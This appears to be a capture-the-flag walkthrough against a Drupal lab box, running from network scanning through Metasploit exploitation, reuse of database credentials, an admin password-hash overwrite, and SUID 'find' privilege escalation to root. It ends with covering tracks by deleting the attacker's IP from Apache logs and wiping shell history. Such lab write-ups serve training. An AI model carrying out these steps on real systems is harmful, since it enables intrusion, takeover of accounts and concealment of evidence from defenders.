1. 信息搜集
1.1. 主机发现
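# Host discovery on the local segment (raw ARP, needs root).
arp-scan -l
# Full TCP port sweep with version/OS detection. The original had a typo ("namp").
# -A is noisy; fine in a lab, worth reconsidering on a real engagement.
nmap -T4 -A -p- 192.168.163.131
# Directory brute force against the web root.
dirb http://192.168.163.131
# Fingerprint the web stack; the CMS and its version drive the exploit choice below.
whatweb -v 192.168.163.131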
1.2. 渗透
# msfconsole transcript: select a Drupal module, point it at the target, run it.
msfconsole
> search drupal
# <id> is the row number from the search output; which module applies depends on
# the Drupal version whatweb reported above.
> use <id>
> set payload payload/...
# rhosts is the target address (192.168.163.131 from the scan above).
> set rhosts <ip>
# `options` is the short form of `show options`; make sure every Required field is set.
# Where the module supports `check`, run it before `run` to confirm the target is
# vulnerable without firing the exploit.
> options
> run
1.2.1. 获取 flag1

提示查找配置文件
1.2.2. 获取 flag2
# From the meterpreter session, drop to an OS shell.
shell
python -c "import pty;pty.spawn('/bin/bash')" # upgrade to a proper tty so interactive tools (mysql, sudo prompts) behave
# Drupal keeps its database credentials in sites/default/settings.php.
# This search is relative to the session's cwd — assumed to be the web root; check with pwd first.
find . -name "set*" # look for the settings file


1.2.3. 获取 flag3
获取到数据库信息
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
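# Connect with the credentials from settings.php (dbuser / R0ck3t).
# Use -p (prompt) rather than -pR0ck3t: a password on the command line is visible
# in `ps` and ends up in shell history. The database is given as an argument, which
# replaces the `use drupaldb;` step. Statements are fed on stdin here; they can
# equally be typed one by one at the mysql> prompt.
mysql -h 127.0.0.1 -P 3306 -u dbuser -p drupaldb <<'SQL'
show tables;
show columns from users;
-- uid=1 is the Drupal admin. Record the current pass value before changing it
-- so the account can be restored during cleanup.
select * from users where uid=1;
-- Replace pass with a hash produced by ./scripts/password-hash.sh (next step).
-- That script generates a random salt, so the value below is from this writeup's
-- run and will not match yours — paste your own output.
update users set pass='$S$DQCOKBJdDlel6L.ZfV1tYbTccflz6hwDisRxE25daht/qoX.Bb6g' where uid=1;
SQL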
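# Locate Drupal's helper scripts (run from the Drupal root; stderr silenced to hide permission noise).
find . -name "*.sh" 2>/dev/null
# Generate a Drupal-format hash for the new password "123".
# The script salts its output, so every run prints a different string: the hash you
# put into the UPDATE must come from your own run, not from the comment below.
./scripts/password-hash.sh 123
# admin's original hash — keep it so the account can be restored afterwards
#   $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
# hash used in this writeup for "123"
#   $S$DQCOKBJdDlel6L.ZfV1tYbTccflz6hwDisRxE25daht/qoX.Bb6g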
admin 登录,搜索页面发现 flag3

1.2.4. 获取 flag4
# /etc/passwd is world-readable; accounts with a real home directory are where the next flag lives.
cat /etc/passwd
# List flag4's home, then read the flag (subshell so the cwd of this session is left alone).
( cd /home/flag4 && ls && cat flag4.txt )


1.2.5. 获取 flag5
按提示提权
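# Enumerate setuid binaries (-perm -4000 and -perm -u=s are the same test, so one pass is enough).
# If find itself is setuid root, it can exec a shell as root.
find / -perm -4000 -type f 2>/dev/null
# find runs -exec as its effective user; bash -p keeps that euid instead of
# resetting it to the real uid. -quit stops after the first path — without it
# find spawns a fresh shell for every file once you exit the previous one.
find . -exec /bin/bash -p \; -quit
# Confirm the escalation: expect euid=0(root).
id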

提权成功,获取 flag5

2. 痕迹清除
2.1. 网站日志清除
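# Locate web server logs in one pass (stderr silenced: /proc and unreadable dirs are noise).
find / -type f \( -name "access*" -o -name "error*" \) 2>/dev/null
# Drop every line mentioning the attacking host from the live Apache logs.
# Dots are escaped: in the original pattern an unescaped '.' matched any character.
# The address is assumed to be the attacker box (the target scanned above was .131).
# Caveats a defender would use: rotated copies (access.log.1, *.gz) are not touched,
# other sources (auth.log, syslog, Drupal's watchdog table if dblog is enabled) may
# also record the session, and sed -i rewrites the file, so its mtime changes and a
# gap in the log is itself a signal.
sed -i '/192\.168\.163\.132/d' /var/log/apache2/access.log
sed -i '/192\.168\.163\.132/d' /var/log/apache2/error.log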
2.2. 数据库恢复和日志清除

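-- Check whether MySQL keeps its own record of the session (general_log, binary log,
-- slow log); the output says which files, if any, would also need attention.
show global variables like '%log%';
-- Database restore: put admin's password hash back to the value recorded in 1.2.3
-- before the UPDATE, so the account is left as it was found.
update users set pass='$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR' where uid=1;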
2.3. history
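# Keep this shell from writing its history file on exit, then clear what is
# already in memory. `history -c` on its own only empties the in-memory list;
# the file on disk, with earlier sessions, is left as it is.
unset HISTFILE
history -c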